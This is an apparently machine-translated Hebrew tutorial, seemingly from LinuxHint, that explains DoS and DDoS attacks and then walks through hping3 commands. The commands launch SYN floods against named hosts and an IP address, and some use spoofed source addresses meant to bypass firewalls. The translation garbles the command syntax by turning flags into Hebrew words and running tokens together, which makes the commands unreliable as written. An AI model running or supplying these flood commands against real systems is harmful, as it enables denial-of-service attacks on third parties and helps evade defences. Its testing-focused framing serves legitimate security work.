התקפות DOS
מתקפת מניעת שירות (DOS) היא טכניקה פשוטה מאוד לשלול נגישות לשירותים (לכן היא נקראת התקפת מניעת שירות). התקפה זו מורכבת מעומס יתר של המטרה במנות גדולות מדי, או כמות גדולה מהן.
התקפה זו אמנם קלה מאוד לביצוע, אך היא אינה פוגעת במידע או בפרטיות המטרה, אך אינה התקפה חודרת ומטרתה למנוע גישה בלבד למטרה.
על ידי שליחת כמות מנות היעד אינו יכול להתמודד עם התוקפים מונעים מהשרת לשרת משתמשים לגיטימיים.
התקפות DOS מתבצעות ממכשיר אחד, ולכן קל לעצור אותן על ידי חסימת כתובת ה- IP של התוקף, אך התוקף יכול לשנות ואף לזייף (לשכפל) את כתובת ה- IP היעד אך לא קשה לחומות אש להתמודד עם התקפות כאלה. , בניגוד למה שקורה עם התקפות DDOS.
התקפות DDOS
מתקפת מניעת שירות מבוזרת (DDOS) דומה להתקפת DOS אך מתבצעת מצמתים (או תוקפים שונים) בו זמנית. בדרך כלל התקפות DDOS מתבצעות על ידי בוטנות. Botnets הם סקריפטים או תוכנות אוטומטיים אשר מדביקים מחשבים לביצוע משימה אוטומטית (במקרה זה התקפת DDOS). האקר יכול ליצור רשת בוט ולהדביק מחשבים רבים שמהם ישיקו רשתות בוט התקפות DOS, העובדה שרשתות בוטות רבות בו זמנית הופכות את מתקפת ה- DOS למתקפת DDOS (לכן זה נקרא מבוזר).
כמובן, ישנם יוצאים מן הכלל בהם התקפות DDOS בוצעו על ידי תוקפים אנושיים אמיתיים, לדוגמה קבוצת האקרים אנונימוס המשולבת על ידי אלפי אנשים ברחבי העולם השתמשה בטכניקה זו לעתים תכופות מאוד בשל יישומה הקל (היא נדרשה רק למתנדבים שחלקו את מטרתם), כך למשל, אנונימוס הותיר את ממשלת לוב של קדאפי מנותקת לחלוטין במהלך הפלישה, המדינה הלובית נותרה חסרת הגנה לפני אלפי תוקפים מרחבי העולם.
התקפות מסוג זה, כאשר הן מבוצעות מצמתים רבים ושונים, קשות ביותר למניעה ולעצור ובדרך כלל דורשות חומרה מיוחדת להתמודד איתן, זאת מכיוון שחומות אש ויישומי הגנה אינם ערוכים להתמודד עם אלפי תוקפים בו זמנית. זה לא המקרה של hping3, רוב ההתקפות שיבוצעו באמצעות כלי זה ייחסמו על ידי התקני הגנה או תוכנה, אך היא שימושית ברשתות מקומיות או נגד מטרות מוגנות בצורה גרועה.
לגבי hping3
הכלי hping3 מאפשר לך לשלוח מנות מניפולציות. כלי זה מאפשר לך לשלוט בגודל, בכמות ובפיצול של מנות על מנת להעמיס על המטרה ולעקוף או לתקוף חומות אש. Hping3 יכול להיות שימושי למטרות בדיקת אבטחה או יכולות, באמצעותו תוכל לבדוק את יעילות חומות האש ואם שרת יכול להתמודד עם כמות גדולה של מנות. להלן תמצא הוראות כיצד להשתמש ב- hping3 לצורכי בדיקות אבטחה.
תחילת העבודה עם התקפות DDOS באמצעות hping3:
בהפצות לינוקס מבוססות Debian ותוכנות מבוססות תוכל להתקין את hping3 על ידי הפעלה:
#מַתְאִיםלהתקיןhping3-והתקפת DOS פשוטה (לא DDOS) תהיה:
#סודוhping3-S --הצפה -V -p 80170.155.9.185איפה:
סודו: נותן הרשאות נחוצות להפעלת hping3.
hping3: תוכנית שיחות hping3.
-S: מציין מנות SYN.
-הצפה: לירות על פי שיקול דעת, התעלמות מתשובות (לכן לא יוצגו תגובות) וחבילות יישלחו מהר ככל האפשר.
-V: מֶלֶל.
-p 80: יציאה 80, תוכל להחליף מספר זה עבור השירות שאתה רוצה לתקוף.
170.155.9.185: כתובת IP.
הצפה באמצעות מנות SYN כנגד יציאה 80:
הדוגמה הבאה מציגה התקפת SYN נגד lacampora.org:
#סודוhping3 lacampora.org-q -ן -d 120 -S -p 80 --הצפה מקור מקוראיפה:
Lacampora.org: הוא המטרה
-q: פלט קצר
-n: הצג את IP היעד במקום המארח.
-d 120: להגדיר את גודל החבילה
– מקור-מקור: להסתיר כתובת IP.
הדוגמה הבאה מציגה דוגמה אפשרית נוספת לשיטפון:
שיטפון SYN נגד נמל 80:
#סודוhping3מקור מקורivan.com-S -q -p 80 --הצפהעם hping3 אתה יכול גם לתקוף את המטרות שלך עם IP מזויף, על מנת לעקוף חומת אש תוכל אפילו לשכפל את IP היעד שלך עצמו, או כל כתובת מותרת שאתה עשוי להכיר (אתה יכול להשיג זאת למשל עם Nmap או לרחרח להאזנה מבוסס חיבורים).
התחביר יהיה:
#סודוhping3-ל <IP מזויף> <יַעַד> -S -q -p 80 --מהר יותר -c2בדוגמה המעשית הזו ההתקפה תיראה:
#סודוhping3-ל190.0.175.100 190.0.175.100-S -q -p 80 --מהר יותר -c2אני מקווה שמצאת הדרכה זו על hping3 שימושית. המשך לעקוב אחר LinuxHint לקבלת טיפים ועדכונים נוספים על לינוקס ורשתות.